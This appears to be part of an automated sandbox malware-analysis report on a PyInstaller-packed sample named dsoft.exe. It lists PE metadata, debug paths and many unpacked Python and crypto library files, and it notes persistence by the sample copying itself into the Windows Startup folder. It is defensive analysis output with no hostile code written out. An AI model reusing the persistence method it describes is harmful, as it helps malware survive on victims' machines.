Source: dsoft.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: dsoft.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: dsoft.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: dsoft.exe, 00000000.00000003.1985477905.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2159177221.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\_lzma.pdbNN source: dsoft.exe, 00000000.00000003.1986492471.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2160087254.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\_asyncio.pdb source: dsoft.exe, 00000000.00000003.1985604407.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2159279158.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\_lzma.pdb source: dsoft.exe, 00000000.00000003.1986492471.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2160087254.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\_multiprocessing.pdb source: dsoft.exe, 00000000.00000003.1986609914.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2160261628.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\select.pdb source: dsoft.exe, 00000000.00000003.1992158737.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2166596083.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\unicodedata.pdb source: dsoft.exe, 00000000.00000003.1994313352.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2168290335.000001463F1F2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\_uuid.pdb source: dsoft.exe, 00000000.00000003.1987314194.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2161628059.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\_socket.pdb source: dsoft.exe, 00000000.00000003.1986851728.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2160707465.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\src\pywin32\build\temp.win-amd64-cpython-310\Release\_win32sysloader.pdb source: dsoft.exe, 00000000.00000003.1995076039.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2168703723.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\src\pywin32\build\temp.win-amd64-cpython-310\Release\win32trace.pdb source: dsoft.exe, 00000000.00000003.1996740060.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2168910308.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: dsoft.exe, 00000000.00000003.1985304722.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2159039587.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: dsoft.exe, 00000000.00000003.1985304722.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2159039587.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\_queue.pdb source: dsoft.exe, 00000000.00000003.1986770676.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2160557351.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\_overlapped.pdb source: dsoft.exe, 00000000.00000003.1986688582.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2160421599.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\_bz2.pdb source: dsoft.exe, 00000000.00000003.1985736440.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2159384277.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: dsoft.exe, 00000000.00000003.1985477905.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2159177221.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\_hashlib.pdb source: dsoft.exe, 00000000.00000003.1986386897.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2159977076.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp

Source: dsoft.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: dsoft.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: dsoft.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: dsoft.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: dsoft.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: VCRUNTIME140.dll.0.dr

Static PE information: 0x8E79CD85 [Sat Sep 30 01:19:01 2045 UTC]

Source: dsoft.exe	Static PE information: section name: _RDATA
Source: mfc140u.dll.0.dr	Static PE information: section name: .didat
Source: VCRUNTIME140.dll.0.dr	Static PE information: section name: _RDATA
Source: libcrypto-1_1.dll.0.dr	Static PE information: section name: .00cfg
Source: libssl-1_1.dll.0.dr	Static PE information: section name: .00cfg
Source: python310.dll.0.dr	Static PE information: section name: PyRuntim
Source: dsoft.exe.1.dr	Static PE information: section name: _RDATA
Source: mfc140u.dll.10.dr	Static PE information: section name: .didat
Source: VCRUNTIME140.dll.10.dr	Static PE information: section name: _RDATA
Source: libcrypto-1_1.dll.10.dr	Static PE information: section name: .00cfg
Source: libssl-1_1.dll.10.dr	Static PE information: section name: .00cfg
Source: python310.dll.10.dr	Static PE information: section name: PyRuntim

Persistence and Installation Behavior

Found pyInstaller with non standard icon

Source: C:\Users\user\Desktop\dsoft.exe	Process created: "C:\Users\user\Desktop\dsoft.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Process created: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe"

Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Cipher\_Salsa20.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Hash\_SHA384.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\win32\win32trace.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_des.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash\_BLAKE2s.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash\_MD2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash\_ghash_clmul.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\pyexpat.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_aes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\_uuid.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_blowfish.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Cipher\_raw_ofb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\win32com\shell\shell.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash\_RIPEMD160.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Cipher\_raw_blowfish.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash\_SHA512.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Util\_strxor.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_chacha20.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\libffi-7.dll	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Hash\_SHA1.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\PublicKey\_ed25519.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\libssl-1_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash\_SHA1.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash\_MD4.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Hash\_ghash_portable.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\pywin32_system32\pywintypes310.dll	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\Pythonwin\mfc140u.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_ecb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_eksblowfish.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Math\_modexp.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\libcrypto-1_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\PublicKey\_x25519.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\charset_normalizer\md.cp310-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_arc2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_cbc.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_ofb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\libffi-7.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\_overlapped.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash\_SHA256.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_des3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\pywin32_system32\pythoncom310.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\win32com\shell\shell.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Protocol\_scrypt.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Hash\_BLAKE2b.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\python310.dll	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Cipher\_raw_ocb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Cipher\_raw_aes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\libcrypto-1_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\PublicKey\_x25519.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\_multiprocessing.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\Pythonwin\win32ui.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\VCRUNTIME140_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Cipher\_ARC4.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Hash\_ghash_clmul.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\PublicKey\_ec_ws.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Cipher\_raw_aesni.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_pkcs1_decode.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash\_SHA384.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_cfb.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Math\_modexp.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\_cffi_backend.cp310-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Cipher\_raw_cfb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Util\_strxor.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Util\_cpuid_c.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Hash\_MD2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\PublicKey\_ed448.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\_cffi_backend.cp310-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_cast.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\_uuid.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\PublicKey\_ec_ws.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_ocb.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Cipher\_raw_eksblowfish.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\win32\win32api.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\PublicKey\_ed25519.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Cipher\_pkcs1_decode.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Hash\_MD4.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\libssl-1_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\pywin32_system32\pywintypes310.dll	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Cipher\_raw_ecb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash\_SHA224.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\pyexpat.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash\_BLAKE2b.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\charset_normalizer\md.cp310-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\Pythonwin\mfc140u.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\PublicKey\_ed448.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Hash\_RIPEMD160.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash\_MD5.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Util\_cpuid_c.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\_overlapped.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\charset_normalizer\md__mypyc.cp310-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\win32\win32trace.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\_asyncio.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Cipher\_raw_cbc.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash\_keccak.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Hash\_ghash_portable.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI69562\_hashlib.pyd	Jump to dropped file
